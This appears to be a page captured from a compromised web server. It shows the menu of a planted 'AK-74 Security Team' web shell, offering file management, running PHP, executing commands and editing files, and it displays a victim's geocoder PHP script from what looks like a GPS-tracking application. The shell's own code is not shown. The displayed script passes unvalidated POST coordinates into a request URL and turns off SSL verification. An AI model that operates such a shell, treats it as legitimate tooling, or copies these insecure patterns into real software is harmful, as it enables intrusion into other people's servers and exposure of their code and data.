.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? include ('../init.php'); include ('../func/fn_common.php'); if(@$_POST['cmd'] == 'latlng') { $result = ''; $lat = $_POST["lat"]; $lng = $_POST["lng"]; if ($gsValues['GEOCODER_CACHE'] == 'true') { $result = getGeocoderCache($lat, $lng); } if ($result == '') { usleep(50000); $url = 'http://localhost/tools/gc/'.$gsValues['GEOCODER_SERVICE'].'.php'; $url .= '?cmd=latlng&lat='.$lat.'&lng='.$lng; $context = stream_context_create(array('http' => array('method' => 'GET', 'timeout' => 3), 'ssl' => array('verify_peer' => false))); $result = @file_get_contents($url, false, $context); $result = json_decode($result); if ($gsValues['GEOCODER_CACHE'] == 'true') { insertGeocoderCache($lat, $lng, $result); } } // fix if space is missing after comma $parts = explode(",", $result); $result = implode(', ', $parts); echo json_encode($result); } if(@$_POST['cmd'] == 'address') { $result = ''; $search = htmlentities(urlencode($_POST["search"])); $url = 'http://localhost/tools/gc/'.$gsValues['GEOCODER_SERVICE'].'.php'; $url .= '?cmd=address&search='.$search; $opts = array('http' => array('method' => 'GET'), 'ssl' => array('verify_peer' => false)); $context = stream_context_create($opts); $result = @file_get_contents($url, false, $context); // fix if space is missing after comma $result = json_decode($result, true); if (isset($result[0])) { if (isset($result[0]['address'])) { $parts = explode(",", $result[0]['address']); $result[0]['address'] = implode(', ', $parts); } } $result = json_encode($result); echo $result; } ?>
Rename:
-